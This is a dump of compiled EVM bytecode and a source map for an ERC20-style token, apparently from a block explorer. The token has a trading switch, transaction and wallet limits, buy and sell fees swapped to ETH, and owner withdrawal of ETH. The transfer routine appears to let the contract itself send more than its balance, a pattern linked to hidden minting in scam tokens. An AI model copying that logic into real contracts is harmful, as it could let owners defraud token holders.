11997565b505050565b6005546001600160a01b0384811691161480159061138957506005546001600160a01b03838116911614155b801561139d57506001600160a01b03821615155b80156113b457506001600160a01b03821661dead14155b80156113ca5750600854600160a01b900460ff16155b156116c857600f5460ff1661145d576001600160a01b03831660009081526016602052604090205460ff168061141857506001600160a01b03821660009081526016602052604090205460ff165b61145d5760405162461bcd60e51b81526020600482015260166024820152752a3930b234b7339034b9903737ba1030b1ba34bb329760511b60448201526064016108e1565b6001600160a01b03831660009081526018602052604090205460ff16801561149e57506001600160a01b03821660009081526017602052604090205460ff16155b1561158757600a548111156115135760405162461bcd60e51b815260206004820152603560248201527f427579207472616e7366657220616d6f756e742065786365656473207468652060448201527436b0bc2a3930b739b0b1ba34b7b720b6b7bab73a1760591b60648201526084016108e1565b600b5461151f83610814565b6115299083611cce565b111561156d5760405162461bcd60e51b815260206004820152601360248201527213585e081dd85b1b195d08195e18d959591959606a1b60448201526064016108e1565b600d805490600061157d83611e45565b91905055506116c8565b6001600160a01b03821660009081526018602052604090205460ff1680156115c857506001600160a01b03831660009081526017602052604090205460ff16155b1561164e57600a5481111561163e5760405162461bcd60e51b815260206004820152603660248201527f53656c6c207472616e7366657220616d6f756e742065786365656473207468656044820152751036b0bc2a3930b739b0b1ba34b7b720b6b7bab73a1760511b60648201526084016108e1565b600e805490600061157d83611e45565b6001600160a01b03821660009081526017602052604090205460ff166116c857600b5461167a83610814565b6116849083611cce565b11156116c85760405162461bcd60e51b815260206004820152601360248201527213585e081dd85b1b195d08195e18d959591959606a1b60448201526064016108e1565b60006116d330610814565b9050801580159081906116ed5750600f54610100900460ff165b80156117035750600854600160a01b900460ff16155b801561172857506001600160a01b03851660009081526018602052604090205460ff16155b801561174d57506001600160a01b03851660009081526016602052604090205460ff16155b801561177257506001600160a01b03841660009081526016602052604090205460ff16155b156117a1576008805460ff60a01b1916600160a01b17905561179383611abf565b6008805460ff60a01b191690555b6008546001600160a01b03861660009081526016602052604090205460ff600160a01b9092048216159116806117ef57506001600160a01b03851660009081526016602052604090205460ff165b156117f8575060005b60008115611883576001600160a01b03861660009081526018602052604090205460ff161561184857611841606461183b60135488611ae490919063ffffffff16565b90611af7565b9050611865565b611862606461183b60125488611ae490919063ffffffff16565b90505b801561187657611876873083611997565b6118808186611e5e565b94505b61188e878787611997565b50505050505050565b6005546001600160a01b031633146108415760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064016108e1565b600580546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a35050565b6001600160a01b038216600081815260186020526040808220805460ff191685151590811790915590519092917fffa9187bf1f18bf477bd0ea1bcbb64e93b6a98132473929edfce215cd9b16fab91a35050565b6001600160a01b0383166119bd5760405162461bcd60e51b81526004016108e190611e00565b6001600160a01b03831660009081526020819052604090205481811015806119ed57506001600160a01b03831630145b611a485760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b60648201526084016108e1565b818110611a5757818103611a5a565b60005b6001600160a01b038581166000818152602081815260408083209590955592871680825290849020805487019055925185815290917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a36112f4565b6000611aca30610814565b9050600081600003611ad95750815b5080611358816110ac565b6000611af08284611ce1565b9392505050565b6000611af08284611e71565b600060208083528351808285015260005b81811015611b3057858101830151858201604001528201611b14565b506000604082860101526040601f19601f8301168501019250505092915050565b6001600160a01b038116811461081157600080fd5b60008060408385031215611b7957600080fd5b8235611b8481611b51565b946020939093013593505050565b600060208284031215611ba457600080fd5b5035919050565b600080600060608486031215611bc057600080fd5b8335611bcb81611b51565b92506020840135611bdb81611b51565b929592945050506040919091013590565b600060208284031215611bfe57600080fd5b8135611af081611b51565b801515811461081157600080fd5b60008060408385031215611c2a57600080fd5b8235611c3581611b51565b91506020830135611c4581611c09565b809150509250929050565b60008060408385031215611c6357600080fd5b8235611c6e81611b51565b91506020830135611c4581611b51565b600181811c90821680611c9257607f821691505b602082108103611cb257634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fd5b8082018082111561074857610748611cb8565b808202811582820484141761074857610748611cb8565b600060208284031215611d0a57600080fd5b8151611af081611b51565b600060208284031215611d2757600080fd5b8151611af081611c09565b600060208284031215611d4457600080fd5b5051919050565b600080600060608486031215611d6057600080fd5b8351925060208401519150604084015190509250925092565b634e487b7160e01b600052603260045260246000fd5b600060a082018783526020878185015260a0604085015281875180845260c086019150828901935060005b81811015611ddf5784516001600160a01b031683529383019391830191600101611dba565b50506001600160a01b03969096166060850152505050608001529392505050565b60208082526025908201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604082015264647265737360d81b606082015260800190565b600060018201611e5757611e57611cb8565b5060010190565b8181038181111561074857610748611cb8565b600082611e8e57634e487b7160e01b600052601260045260246000fd5b50049056fea2646970667358221220319d0e2530d5269e22180e26ffd0aaf169ebbb2660dd6ead5dd5c697728bcbfa64736f6c63430008130033

Deployed Bytecode Sourcemap

28105:8471:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;17912:100;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;19531:201;;;;;;;;;;-1:-1:-1;19531:201:0;;;;;:::i;:::-;;:::i;:::-;;;1188:14:1;;1181:22;1163:41;;1151:2;1136:18;19531:201:0;1023:187:1;28904:24:0;;;;;;;;;;;;;;;;;;;1361:25:1;;;1349:2;1334:18;28904:24:0;1215:177:1;18300:108:0;;;;;;;;;;-1:-1:-1;18388:12:0;;18300:108;;36000:255;;;;;;;;;;-1:-1:-1;36000:255:0;;;;;:::i;:::-;;:::i;:::-;;20312:261;;;;;;;;;;-1:-1:-1;20312:261:0;;;;;:::i;:::-;;:::i;28611:62::-;;;;;;;;;;;;;;;;30469:100;;;;;;;;;;-1:-1:-1;28603:1:0;30469:100;;;2215:4:1;2203:17;;;2185:36;;2173:2;2158:18;30469:100:0;2043:184:1;28569:35:0;;;;;;;;;;;;28603:1;28569:35;;20982:238;;;;;;;;;;-1:-1:-1;20982:238:0;;;;;:::i;:::-;;:::i;29090:26::-;;;;;;;;;;;;;;;;32155:126;;;;;;;;;;-1:-1:-1;32155:126:0;;;;;:::i;:::-;-1:-1:-1;;;;;32245:28:0;32221:4;32245:28;;;:19;:28;;;;;;;;;32155:126;35797:195;;;;;;;;;;;;;:::i;28186:52::-;;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;2674:32:1;;;2656:51;;2644:2;2629:18;28186:52:0;2484:229:1;29123:27:0;;;;;;;;;;;;;;;;28975:31;;;;;;;;;;-1:-1:-1;28975:31:0;;;;;;;;;;;18471:127;;;;;;;;;;-1:-1:-1;18471:127:0;;;;;:::i;:::-;;:::i;16436:103::-;;;;;;;;;;;;;:::i;35265:194::-;;;;;;;;;;;;;:::i;31343:159::-;;;;;;;;;;-1:-1:-1;31343:159:0;;;;;:::i;:::-;;:::i;35467:185::-;;;;;;;;;;;;;:::i;15795:87::-;;;;;;;;;;-1:-1:-1;15868:6:0;;-1:-1:-1;;;;;15868:6:0;15795:87;;18131:104;;;;;;;;;;;;;:::i;31700:253::-;;;;;;;;;;-1:-1:-1;31700:253:0;;;;;:::i;:::-;;:::i;35660:129::-;;;;;;;;;;-1:-1:-1;35660:129:0;;;;;:::i;:::-;;:::i;21723:424::-;;;;;;;;;;-1:-1:-1;21723:424:0;;;;;:::i;:::-;;:::i;18804:193::-;;;;;;;;;;-1:-1:-1;18804:193:0;;;;;:::i;:::-;;:::i;31510:182::-;;;;;;;;;;-1:-1:-1;31510:182:0;;;;;:::i;:::-;;:::i;28680:62::-;;;;;;;;;;;;;;;;30577:758;;;;;;;;;;;;;:::i;28874:23::-;;;;;;;;;;;;;;;;19060:151;;;;;;;;;;-1:-1:-1;19060:151:0;;;;;:::i;:::-;;:::i;28807:60::-;;;;;;;;;;;;;;;;29052:31;;;;;;;;;;;;;;;;29015:30;;;;;;;;;;;;;;;;16694:201;;;;;;;;;;-1:-1:-1;16694:201:0;;;;;:::i;:::-;;:::i;28749:51::-;;;;;;;;;;;;;;;;28937:31;;;;;;;;;;-1:-1:-1;28937:31:0;;;;;;;;17912:100;17966:13;17999:5;17992:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;17912:100;:::o;19531:201::-;19614:4;15091:10;19670:32;15091:10;19686:7;19695:6;19670:8;:32::i;:::-;19720:4;19713:11;;;19531:201;;;;;:::o;36000:255::-;36090:15;;-1:-1:-1;;;;;36090:15:0;15091:10;-1:-1:-1;;;;;36074:31:0;;36066:40;;;;;;36117:23;36143:24;36161:4;36143:9;:24::i;:::-;36117:50;;36196:15;36186:6;:25;;36178:34;;;;;;36223:24;36240:6;36223:16;:24::i;:::-;36055:200;36000:255;:::o;20312:261::-;20409:4;15091:10;20467:38;20483:4;15091:10;20498:6;20467:15;:38::i;:::-;20516:27;20526:4;20532:2;20536:6;20516:9;:27::i;:::-;-1:-1:-1;20561:4:0;;20312:261;-1:-1:-1;;;;20312:261:0:o;20982:238::-;21070:4;15091:10;21126:64;15091:10;21142:7;21179:10;21151:25;15091:10;21142:7;21151:9;:25::i;:::-;:38;;;;:::i;:::-;21126:8;:64::i;35797:195::-;35863:15;;-1:-1:-1;;;;;35863:15:0;15091:10;-1:-1:-1;;;;;35847:31:0;;35839:40;;;;;;35890:23;35916:24;35934:4;35916:9;:24::i;:::-;35890:50;;35951:33;35968:15;35951:16;:33::i;:::-;35828:164;35797:195::o;18471:127::-;-1:-1:-1;;;;;18572:18:0;18545:7;18572:18;;;;;;;;;;;;18471:127::o;16436:103::-;15681:13;:11;:13::i;:::-;16501:30:::1;16528:1;16501:18;:30::i;:::-;16436:103::o:0;35265:194::-;15681:13;:11;:13::i;:::-;35319:25:::1;35347:13;18388:12:::0;;;18300:108;35347:13:::1;35371:20;:40:::0;;;35422:9:::1;:29:::0;-1:-1:-1;35265:194:0:o;31343:159::-;15681:13;:11;:13::i;:::-;-1:-1:-1;;;;;31448:39:0;;;::::1;;::::0;;;:31:::1;:39;::::0;;;;:46;;-1:-1:-1;;31448:46:0::1;::::0;::::1;;::::0;;;::::1;::::0;;31343:159::o;35467:185::-;15681:13;:11;:13::i;:::-;35554:1:::1;35530:21;:25;35522:60;;;::::0;-1:-1:-1;;;35522:60:0;;4678:2:1;35522:60:0::1;::::0;::::1;4660:21:1::0;4717:2;4697:18;;;4690:30;-1:-1:-1;;;4736:18:1;;;4729:52;4798:18;;35522:60:0::1;;;;;;;;;35593:51;::::0;35601:10:::1;::::0;35622:21:::1;35593:51:::0;::::1;;;::::0;::::1;::::0;;;35622:21;35601:10;35593:51;::::1;;;;;;;;;;;;;::::0;::::1;;;;18131:104:::0;18187:13;18220:7;18213:14;;;;;:::i;31700:253::-;15681:13;:11;:13::i;:::-;31822::::1;::::0;-1:-1:-1;;;;;31822:13:0;;::::1;31814:21:::0;;::::1;::::0;31806:87:::1;;;::::0;-1:-1:-1;;;31806:87:0;;5029:2:1;31806:87:0::1;::::0;::::1;5011:21:1::0;5068:2;5048:18;;;5041:30;5107:34;5087:18;;;5080:62;-1:-1:-1;;;5158:18:1;;;5151:51;5219:19;;31806:87:0::1;4827:417:1::0;31806:87:0::1;31904:41;31933:4;31939:5;31904:28;:41::i;35660:129::-:0;15681:13;:11;:13::i;:::-;35761:20:::1;:7:::0;35772:8:::1;35761:20;:::i;:::-;35740:18;:41:::0;-1:-1:-1;35660:129:0:o;21723:424::-;21816:4;15091:10;21816:4;21899:25;15091:10;21916:7;21899:9;:25::i;:::-;21872:52;;21963:15;21943:16;:35;;21935:85;;;;-1:-1:-1;;;21935:85:0;;5624:2:1;21935:85:0;;;5606:21:1;5663:2;5643:18;;;5636:30;5702:34;5682:18;;;5675:62;-1:-1:-1;;;5753:18:1;;;5746:35;5798:19;;21935:85:0;5422:401:1;21935:85:0;22048:60;22057:5;22064:7;22092:15;22073:16;:34;22048:8;:60::i;18804:193::-;18883:4;15091:10;18939:28;15091:10;18956:2;18960:6;18939:9;:28::i;31510:182::-;15681:13;:11;:13::i;:::-;-1:-1:-1;;;;;31595:28:0;::::1;;::::0;;;:19:::1;:28;::::0;;;;;;;;:39;;-1:-1:-1;;31595:39:0::1;::::0;::::1;;::::0;;::::1;::::0;;;31650:34;;1163:41:1;;;31650:34:0::1;::::0;1136:18:1;31650:34:0::1;;;;;;;31510:182:::0;;:::o;30577:758::-;15681:13;:11;:13::i;:::-;30641:11:::1;::::0;::::1;;30640:12;30632:42;;;::::0;-1:-1:-1;;;30632:42:0;;6030:2:1;30632:42:0::1;::::0;::::1;6012:21:1::0;6069:2;6049:18;;;6042:30;-1:-1:-1;;;6088:18:1;;;6081:47;6145:18;;30632:42:0::1;5828:341:1::0;30632:42:0::1;30721:16;-1:-1:-1::0;;;;;30721:24:0::1;;:26;;;;;;;;;;;;;;;;;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;-1:-1:-1::0;;;;;30703:56:0::1;;30768:4;30775:16;-1:-1:-1::0;;;;;30775:21:0::1;;:23;;;;;;;;;;;;;;;;;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;30703:96;::::0;-1:-1:-1;;;;;;30703:96:0::1;::::0;;;;;;-1:-1:-1;;;;;6660:15:1;;;30703:96:0::1;::::0;::::1;6642:34:1::0;6712:15;;6692:18;;;6685:43;6577:18;;30703:96:0::1;;;;;;;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;30687:13;:112:::0;;-1:-1:-1;;;;;;30687:112:0::1;-1:-1:-1::0;;;;;30687:112:0;;;::::1;::::0;;::::1;::::0;;30810:58:::1;::::0;-1:-1:-1;30810:28:0::1;:58::i;:::-;30913:13;::::0;30879:55:::1;::::0;-1:-1:-1;;;;;30913:13:0::1;::::0;30879:25:::1;:55::i;:::-;30952:13;::::0;30945:72:::1;::::0;-1:-1:-1;;;30945:72:0;;-1:-1:-1;;;;;30983:16:0::1;6931:32:1::0;;30945:72:0::1;::::0;::::1;6913:51:1::0;-1:-1:-1;;6980:18:1;;;6973:34;30952:13:0;;::::1;::::0;30945:29:::1;::::0;6886:18:1;;30945:72:0::1;;;;;;;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;31028:70;31045:4;31060:16;31079:18;;31028:8;:70::i;:::-;31190:46;::::0;-1:-1:-1;;;31190:46:0;;31183:4:::1;31190:46;::::0;::::1;2656:51:1::0;;;-1:-1:-1;;;;;31111:16:0::1;:32;::::0;::::1;::::0;31152:21:::1;::::0;31183:4;;31190:31:::1;::::0;2629:18:1;;31190:46:0::1;;;;;;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;31238:1;31241::::0;31244:7:::1;15868:6:::0;;-1:-1:-1;;;;;15868:6:0;;15795:87;31244:7:::1;31111:158;::::0;::::1;::::0;;;-1:-1:-1;;;;;;31111:158:0;;;-1:-1:-1;;;;;7816:15:1;;;31111:158:0::1;::::0;::::1;7798:34:1::0;7848:18;;;7841:34;;;;7891:18;;;7884:34;;;;7934:18;;;7927:34;7998:15;;;7977:19;;;7970:44;31253:15:0::1;8030:19:1::0;;;8023:35;7732:19;;31111:158:0::1;;;;;;;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;-1:-1:-1::0;;31280:11:0::1;:18:::0;;-1:-1:-1;;31309:18:0;;;;;-1:-1:-1;30577:758:0:o;19060:151::-;-1:-1:-1;;;;;19176:18:0;;;19149:7;19176:18;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;19060:151::o;16694:201::-;15681:13;:11;:13::i;:::-;-1:-1:-1;;;;;16783:22:0;::::1;16775:73;;;::::0;-1:-1:-1;;;16775:73:0;;8582:2:1;16775:73:0::1;::::0;::::1;8564:21:1::0;8621:2;8601:18;;;8594:30;8660:34;8640:18;;;8633:62;-1:-1:-1;;;8711:18:1;;;8704:36;8757:19;;16775:73:0::1;8380:402:1::0;16775:73:0::1;16859:28;16878:8;16859:18;:28::i;25669:346::-:0;-1:-1:-1;;;;;25771:19:0;;25763:68;;;;-1:-1:-1;;;25763:68:0;;8989:2:1;25763:68:0;;;8971:21:1;9028:2;9008:18;;;9001:30;9067:34;9047:18;;;9040:62;-1:-1:-1;;;9118:18:1;;;9111:34;9162:19;;25763:68:0;8787:400:1;25763:68:0;-1:-1:-1;;;;;25850:21:0;;25842:68;;;;-1:-1:-1;;;25842:68:0;;9394:2:1;25842:68:0;;;9376:21:1;9433:2;9413:18;;;9406:30;9472:34;9452:18;;;9445:62;-1:-1:-1;;;9523:18:1;;;9516:32;9565:19;;25842:68:0;9192:398:1;25842:68:0;-1:-1:-1;;;;;25923:18:0;;;;;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;:36;;;25975:32;;1361:25:1;;;25975:32:0;;1334:18:1;25975:32:0;;;;;;;25669:346;;;:::o;34787:470::-;34879:16;;;34893:1;34879:16;;;;;;;;34855:21;;34879:16;;;;;;;;;;-1:-1:-1;34879:16:0;34855:40;;34924:4;34906;34911:1;34906:7;;;;;;;;:::i;:::-;;;;;;:23;-1:-1:-1;;;;;34906:23:0;;;-1:-1:-1;;;;;34906:23:0;;;;;34950:16;-1:-1:-1;;;;;34950:21:0;;:23;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;34940:4;34945:1;34940:7;;;;;;;;:::i;:::-;;;;;;:33;-1:-1:-1;;;;;34940:33:0;;;-1:-1:-1;;;;;34940:33:0;;;;;34984:63;35001:4;35016:16;35035:11;34984:8;:63::i;:::-;35058:191;;-1:-1:-1;;;35058:191:0;;-1:-1:-1;;;;;35058:16:0;:67;;;;:191;;35140:11;;35166:1;;35182:4;;11165:42;;35223:15;;35058:191;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;34842:415;34787:470;:::o;26306:407::-;26407:24;26434:25;26444:5;26451:7;26434:9;:25::i;:::-;26407:52;;-1:-1:-1;;26474:16:0;:37;26470:236;;26556:6;26536:16;:26;;26528:68;;;;-1:-1:-1;;;26528:68:0;;11046:2:1;26528:68:0;;;11028:21:1;11085:2;11065:18;;;11058:30;11124:31;11104:18;;;11097:59;11173:18;;26528:68:0;10844:353:1;26528:68:0;26632:51;26641:5;26648:7;26676:6;26657:16;:25;26632:8;:51::i;:::-;26396:317;26306:407;;;:::o;32291:2488::-;-1:-1:-1;;;;;32389:18:0;;32381:68;;;;-1:-1:-1;;;32381:68:0;;;;;;;:::i;:::-;32478:15;;32466:8;;:27;32462:81;;32520:11;;32510:7;:21;32462:81;32572:16;;32559:9;;:29;32555:85;;32616:12;;32605:8;:23;32555:85;32656:6;32666:1;32656:11;32652:93;;32684:28;32700:4;32706:2;32710:1;32684:15;:28::i;:::-;32291:2488;;;:::o;32652:93::-;15868:6;;-1:-1:-1;;;;;32759:15:0;;;15868:6;;32759:15;;;;:32;;-1:-1:-1;15868:6:0;;-1:-1:-1;;;;;32778:13:0;;;15868:6;;32778:13;;32759:32;:52;;;;-1:-1:-1;;;;;;32795:16:0;;;;32759:52;:77;;;;-1:-1:-1;;;;;;32815:21:0;;32829:6;32815:21;;32759:77;:90;;;;-1:-1:-1;32841:8:0;;-1:-1:-1;;;32841:8:0;;;;32840:9;32759:90;32755:1042;;;32873:11;;;;32868:140;;-1:-1:-1;;;;;32913:25:0;;;;;;:19;:25;;;;;;;;;:52;;-1:-1:-1;;;;;;32942:23:0;;;;;;:19;:23;;;;;;;;32913:52;32905:87;;;;-1:-1:-1;;;32905:87:0;;11810:2:1;32905:87:0;;;11792:21:1;11849:2;11829:18;;;11822:30;-1:-1:-1;;;11868:18:1;;;11861:52;11930:18;;32905:87:0;11608:346:1;32905:87:0;-1:-1:-1;;;;;33028:31:0;;;;;;:25;:31;;;;;;;;:71;;;;-1:-1:-1;;;;;;33064:35:0;;;;;;:31;:35;;;;;;;;33063:36;33028:71;33024:762;;;33152:20;;33142:6;:30;;33134:96;;;;-1:-1:-1;;;33134:96:0;;12161:2:1;33134:96:0;;;12143:21:1;12200:2;12180:18;;;12173:30;12239:34;12219:18;;;12212:62;-1:-1:-1;;;12290:18:1;;;12283:51;12351:19;;33134:96:0;11959:417:1;33134:96:0;33283:9;;33266:13;33276:2;33266:9;:13::i;:::-;33257:22;;:6;:22;:::i;:::-;:35;;33249:67;;;;-1:-1:-1;;;33249:67:0;;12583:2:1;33249:67:0;;;12565:21:1;12622:2;12602:18;;;12595:30;-1:-1:-1;;;12641:18:1;;;12634:49;12700:18;;33249:67:0;12381:343:1;33249:67:0;33335:8;:10;;;:8;:10;;;:::i;:::-;;;;;;33024:762;;;-1:-1:-1;;;;;33386:29:0;;;;;;:25;:29;;;;;;;;:71;;;;-1:-1:-1;;;;;;33420:37:0;;;;;;:31;:37;;;;;;;;33419:38;33386:71;33382:404;;;33496:20;;33486:6;:30;;33478:97;;;;-1:-1:-1;;;33478:97:0;;13071:2:1;33478:97:0;;;13053:21:1;13110:2;13090:18;;;13083:30;13149:34;13129:18;;;13122:62;-1:-1:-1;;;13200:18:1;;;13193:52;13262:19;;33478:97:0;12869:418:1;33478:97:0;33594:9;:11;;;:9;:11;;;:::i;33382:404::-;-1:-1:-1;;;;;33647:35:0;;;;;;:31;:35;;;;;;;;33642:144;;33737:9;;33720:13;33730:2;33720:9;:13::i;:::-;33711:22;;:6;:22;:::i;:::-;:35;;33703:67;;;;-1:-1:-1;;;33703:67:0;;12583:2:1;33703:67:0;;;12565:21:1;12622:2;12602:18;;;12595:30;-1:-1:-1;;;12641:18:1;;;12634:49;12700:18;;33703:67:0;12381:343:1;33703:67:0;33809:28;33840:24;33858:4;33840:9;:24::i;:::-;33809:55;-1:-1:-1;33892:24:0;;;;;;;33933:22;;-1:-1:-1;33944:11:0;;;;;;;33933:22;:35;;;;-1:-1:-1;33960:8:0;;-1:-1:-1;;;33960:8:0;;;;33959:9;33933:35;:71;;;;-1:-1:-1;;;;;;33973:31:0;;;;;;:25;:31;;;;;;;;33972:32;33933:71;:101;;;;-1:-1:-1;;;;;;34009:25:0;;;;;;:19;:25;;;;;;;;34008:26;33933:101;:129;;;;-1:-1:-1;;;;;;34039:23:0;;;;;;:19;:23;;;;;;;;34038:24;33933:129;33929:239;;;34079:8;:15;;-1:-1:-1;;;;34079:15:0;-1:-1:-1;;;34079:15:0;;;34109:16;34118:6;34109:8;:16::i;:::-;34140:8;:16;;-1:-1:-1;;;;34140:16:0;;;33929:239;34196:8;;-1:-1:-1;;;;;34221:25:0;;34180:12;34221:25;;;:19;:25;;;;;;34196:8;-1:-1:-1;;;34196:8:0;;;;;34195:9;;34221:25;;:52;;-1:-1:-1;;;;;;34250:23:0;;;;;;:19;:23;;;;;;;;34221:52;34217:100;;;-1:-1:-1;34300:5:0;34217:100;34329:12;34362:7;34358:370;;;-1:-1:-1;;;;;34390:29:0;;;;;;:25;:29;;;;;;;;34386:195;;;34447:29;34472:3;34447:20;34458:8;;34447:6;:10;;:20;;;;:::i;:::-;:24;;:29::i;:::-;34440:36;;34386:195;;;34537:28;34561:3;34537:19;34548:7;;34537:6;:10;;:19;;;;:::i;:28::-;34530:35;;34386:195;34601:8;;34597:91;;34630:42;34646:4;34660;34667;34630:15;:42::i;:::-;34702:14;34712:4;34702:14;;:::i;:::-;;;34358:370;34738:33;34754:4;34760:2;34764:6;34738:15;:33::i;:::-;32370:2409;;;;32291:2488;;;:::o;15960:132::-;15868:6;;-1:-1:-1;;;;;15868:6:0;15091:10;16024:23;16016:68;;;;-1:-1:-1;;;16016:68:0;;13627:2:1;16016:68:0;;;13609:21:1;;;13646:18;;;13639:30;13705:34;13685:18;;;13678:62;13757:18;;16016:68:0;13425:356:1;17055:191:0;17148:6;;;-1:-1:-1;;;;;17165:17:0;;;-1:-1:-1;;;;;;17165:17:0;;;;;;;17198:40;;17148:6;;;17165:17;17148:6;;17198:40;;17129:16;;17198:40;17118:128;17055:191;:::o;31961:186::-;-1:-1:-1;;;;;32044:31:0;;;;;;:25;:31;;;;;;:39;;-1:-1:-1;;32044:39:0;;;;;;;;;;32099:40;;32044:39;;:31;32099:40;;;31961:186;;:::o;22574:850::-;-1:-1:-1;;;;;22671:18:0;;22663:68;;;;-1:-1:-1;;;22663:68:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;22817:15:0;;22795:19;22817:15;;;;;;;;;;;22851:21;;;;;:44;;-1:-1:-1;;;;;;22876:19:0;;22890:4;22876:19;22851:44;22843:95;;;;-1:-1:-1;;;22843:95:0;;13988:2:1;22843:95:0;;;13970:21:1;14027:2;14007:18;;;14000:30;14066:34;14046:18;;;14039:62;-1:-1:-1;;;14117:18:1;;;14110:36;14163:19;;22843:95:0;13786:402:1;22843:95:0;23079:6;23067:11;:18;:41;;23102:6;23088:11;:20;23067:41;;;23086:1;23067:41;-1:-1:-1;;;;;23049:15:0;;;:9;:15;;;;;;;;;;;:59;;;;23288:13;;;;;;;;;;:23;;;;;;23340:26;;1361:25:1;;;23049:15:0;;23340:26;;1334:18:1;23340:26:0;;;;;;;23379:37;32291:2488;36263:310;36316:23;36342:24;36360:4;36342:9;:24::i;:::-;36316:50;;36377:20;36412:15;36431:1;36412:20;36408:74;;-1:-1:-1;36464:6:0;36408:74;-1:-1:-1;36509:15:0;36535:30;36509:15;36535:16;:30::i;3206:98::-;3264:7;3291:5;3295:1;3291;:5;:::i;:::-;3284:12;3206:98;-1:-1:-1;;;3206:98:0:o;3605:::-;3663:7;3690:5;3694:1;3690;:5;:::i;14:548:1:-;126:4;155:2;184;173:9;166:21;216:6;210:13;259:6;254:2;243:9;239:18;232:34;284:1;294:140;308:6;305:1;302:13;294:140;;;403:14;;;399:23;;393:30;369:17;;;388:2;365:26;358:66;323:10;;294:140;;;298:3;483:1;478:2;469:6;458:9;454:22;450:31;443:42;553:2;546;542:7;537:2;529:6;525:15;521:29;510:9;506:45;502:54;494:62;;;;14:548;;;;:::o;567:131::-;-1:-1:-1;;;;;642:31:1;;632:42;;622:70;;688:1;685;678:12;703:315;771:6;779;832:2;820:9;811:7;807:23;803:32;800:52;;;848:1;845;838:12;800:52;887:9;874:23;906:31;931:5;906:31;:::i;:::-;956:5;1008:2;993:18;;;;980:32;;-1:-1:-1;;;703:315:1:o;1397:180::-;1456:6;1509:2;1497:9;1488:7;1484:23;1480:32;1477:52;;;1525:1;1522;1515:12;1477:52;-1:-1:-1;1548:23:1;;1397:180;-1:-1:-1;1397:180:1:o;1582:456::-;1659:6;1667;1675;1728:2;1716:9;1707:7;1703:23;1699:32;1696:52;;;1744:1;1741;1734:12;1696:52;1783:9;1770:23;1802:31;1827:5;1802:31;:::i;:::-;1852:5;-1:-1:-1;1909:2:1;1894:18;;1881:32;1922:33;1881:32;1922:33;:::i;:::-;1582:456;;1974:7;;-1:-1:-1;;;2028:2:1;2013:18;;;;2000:32;;1582:456::o;2232:247::-;2291:6;2344:2;2332:9;2323:7;2319:23;2315:32;2312:52;;;2360:1;2357;2350:12;2312:52;2399:9;2386:23;2418:31;2443:5;2418:31;:::i;2718:118::-;2804:5;2797:13;2790:21;2783:5;2780:32;2770:60;;2826:1;2823;2816:12;2841:382;2906:6;2914;2967:2;2955:9;2946:7;2942:23;2938:32;2935:52;;;2983:1;2980;2973:12;2935:52;3022:9;3009:23;3041:31;3066:5;3041:31;:::i;:::-;3091:5;-1:-1:-1;3148:2:1;3133:18;;3120:32;3161:30;3120:32;3161:30;:::i;:::-;3210:7;3200:17;;;2841:382;;;;;:::o;3436:388::-;3504:6;3512;3565:2;3553:9;3544:7;3540:23;3536:32;3533:52;;;3581:1;3578;3571:12;3533:52;3620:9;3607:23;3639:31;3664:5;3639:31;:::i;:::-;3689:5;-1:-1:-1;3746:2:1;3731:18;;3718:32;3759:33;3718:32;3759:33;:::i;3829:380::-;3908:1;3904:12;;;;3951;;;3972:61;;4026:4;4018:6;4014:17;4004:27;;3972:61;4079:2;4071:6;4068:14;4048:18;4045:38;4042:161;;4125:10;4120:3;4116:20;4113:1;4106:31;4160:4;4157:1;4150:15;4188:4;4185:1;4178:15;4042:161;;3829:380;;;:::o;4214:127::-;4275:10;4270:3;4266:20;4263:1;4256:31;4306:4;4303:1;4296:15;4330:4;4327:1;4320:15;4346:125;4411:9;;;4432:10;;;4429:36;;;4445:18;;:::i;5249:168::-;5322:9;;;5353;;5370:15;;;5364:22;;5350:37;5340:71;;5391:18;;:::i;6174:251::-;6244:6;6297:2;6285:9;6276:7;6272:23;6268:32;6265:52;;;6313:1;6310;6303:12;6265:52;6345:9;6339:16;6364:31;6389:5;6364:31;:::i;7018:245::-;